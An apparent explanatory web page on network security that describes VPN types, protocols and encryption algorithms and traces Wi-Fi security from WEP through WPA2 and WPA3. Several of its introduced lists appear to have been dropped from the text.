When using the internet or wireless networks, the security of your communication is extremely important. On public Wi-Fi or general internet connections, there is a risk that your communications could be intercepted by third parties. This page explains VPNs (Virtual Private Networks) and wireless security standards (WPA2/WPA3), which are technologies for securely protecting communications.
A VPN (Virtual Private Network) is a technology that allows you to communicate securely as if you were on a private network, even while using the public internet. A VPN creates an encrypted tunnel and exchanges data within it, preventing eavesdropping and tampering of communication content.
Using a VPN provides the following benefits:
A remote access VPN is used by individual users to connect to a company's private network over the internet. It is often used for telecommuting or remote work to access internal company systems.
A Site-to-Site VPN is used to connect the networks of multiple geographically dispersed locations. For example, it can securely connect the networks of a headquarters and a branch office, allowing them to function as a single large network.
A client VPN is used by individual users to encrypt their internet connection and protect their privacy. It is used when using public Wi-Fi or when accessing geo-restricted content.
VPN protocols define the method for establishing a VPN connection and the encryption method. The main VPN protocols include the following:
OpenVPN is an open-source VPN protocol that offers high security and flexibility. It uses SSL/TLS for encryption and has the advantage of being able to easily bypass firewall restrictions. It can operate on both TCP/UDP ports and is adopted by many VPN services.
WireGuard is a relatively new VPN protocol characterized by its simple design and high-speed connection. It uses the latest encryption technology and has a small codebase, making security audits easier. It also has low battery consumption, making it suitable for mobile devices.
The combination of IKEv2 (Internet Key Exchange version 2) and IPsec (Internet Protocol Security) provides a stable and high-speed connection. It is particularly strong when switching between networks (e.g., from Wi-Fi to mobile data) and is suitable for mobile devices.
The combination of L2TP (Layer 2 Tunneling Protocol) and IPsec is a widely supported VPN protocol. L2TP provides tunneling, and IPsec handles the encryption. It is secure when properly configured, but it can be blocked by some firewalls.
SSTP (Secure Socket Tunneling Protocol) is a protocol developed by Microsoft that communicates similarly to HTTPS traffic using SSL/TLS. It has the advantage of being able to easily pass through firewalls, but it is mainly supported on the Windows platform.
The security of a VPN largely depends on the encryption algorithms used. Modern VPN services use the following encryption technologies:
AES is currently the most widely used symmetric encryption algorithm. VPNs typically use AES-128, AES-192, or AES-256. The higher the number, the stronger the encryption, but the processing load also increases.
ChaCha20 is a type of stream cipher that can operate faster than AES, especially in environments without hardware acceleration (such as mobile devices). It is adopted by new VPN protocols like WireGuard.
RSA and Elliptic Curve Cryptography are used as public-key cryptosystems for key exchange and authentication. Compared to RSA, ECC can achieve a similar level of security with a shorter key length, enabling more efficient processing.
PFS is a technology that generates a temporary key for each session. This ensures that even if a private key is compromised, past communication content cannot be decrypted. Modern VPN protocols achieve PFS using methods like the Diffie-Hellman key exchange.
Many companies provide VPNs for remote workers to securely access the corporate network. This allows for secure access to internal systems and resources from outside the company.
Public Wi-Fi in places like cafes, hotels, and airports can pose a high security risk. By using a VPN, you can encrypt your communication content and protect your data from eavesdropping and man-in-the-middle attacks.
Some websites and streaming services have access restrictions based on region. By using a VPN to access them through a server in a different country or region, you may be able to bypass these restrictions.
Using a VPN can prevent your Browse history from being tracked by your Internet Service Provider (ISP) and ad networks. Your IP address is anonymized, which enhances your online privacy.
The security of Wi-Fi networks has evolved with the advancement of technology. The evolution of the main Wi-Fi security protocols is as follows:
WEP was an early Wi-Fi security protocol introduced in 1999. However, serious vulnerabilities were discovered, and it is now considered insecure. WEP should not be used as it can be cracked in a matter of minutes.
WPA was introduced in 2003 to address the vulnerabilities of WEP. It used TKIP (Temporal Key Integrity Protocol) and was more secure than WEP, but some vulnerabilities still existed.
WPA2 was introduced in 2004, and its security was significantly improved by adopting AES encryption. It has been used as the standard Wi-Fi security protocol for many years.
WPA3 is the latest Wi-Fi security protocol, introduced in 2018. It addresses the vulnerabilities of WPA2 and provides stronger encryption and authentication mechanisms.
WPA2 was introduced in 2004 and became mandatory for all Wi-Fi certified devices manufactured after 2006. Its main features are as follows:
WPA2 uses AES (Advanced Encryption Standard) and CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). This provides stronger encryption than the TKIP used in WEP and WPA.
WPA2-Personal (Pre-Shared Key) is a mode for homes and small offices. All devices connect to the network using the same passphrase (Wi-Fi password). Communication is encrypted using a PMK (Pairwise Master Key) generated from the passphrase.
WPA2-Enterprise is a mode for businesses and large organizations. It works in conjunction with an authentication server, such as a RADIUS server, and uses different authentication credentials (such as a username and password) for each user to access the network. This simplifies user management and improves security.
Several vulnerabilities have also been discovered in WPA2:
WPA3 is the latest Wi-Fi security protocol, introduced in 2018, and was developed to address the vulnerabilities of WPA2. Its main features are as follows:
WPA3 replaces the PSK (Pre-Shared Key) of WPA2 with SAE (also known as the Dragonfly Handshake). SAE increases resistance to brute-force attacks and prevents offline dictionary attacks. It also provides Perfect Forward Secrecy (PFS), ensuring that past communications remain secure even if a key is compromised in the future.
WPA3-Personal is a mode for homes and small offices that provides stronger protection using SAE. Even if a simple password is used, protection against offline dictionary attacks is enhanced.
WPA3-Enterprise is a mode for businesses and large organizations that provides a 192-bit security suite. This includes encryption with GCMP-256 (Galois/Counter Mode Protocol), authentication with GMAC-256, and key exchange and authentication with ECDSA (Elliptic Curve Digital Signature Algorithm) or 3072-bit RSA.
WPA3 introduces the Device Provisioning Protocol (DPP) to provide a secure alternative to WPS. By simply scanning a QR code or NFC tag, IoT devices without a display or keyboard can be securely connected to the network.
Enhanced Open is a feature that provides encryption even on open (password-less) Wi-Fi networks. It uses Opportunistic Wireless Encryption (OWE) to encrypt communications even without authentication, reducing the risk of eavesdropping on public Wi-Fi.
The best practices for enhancing the security of your Wi-Fi network are as follows: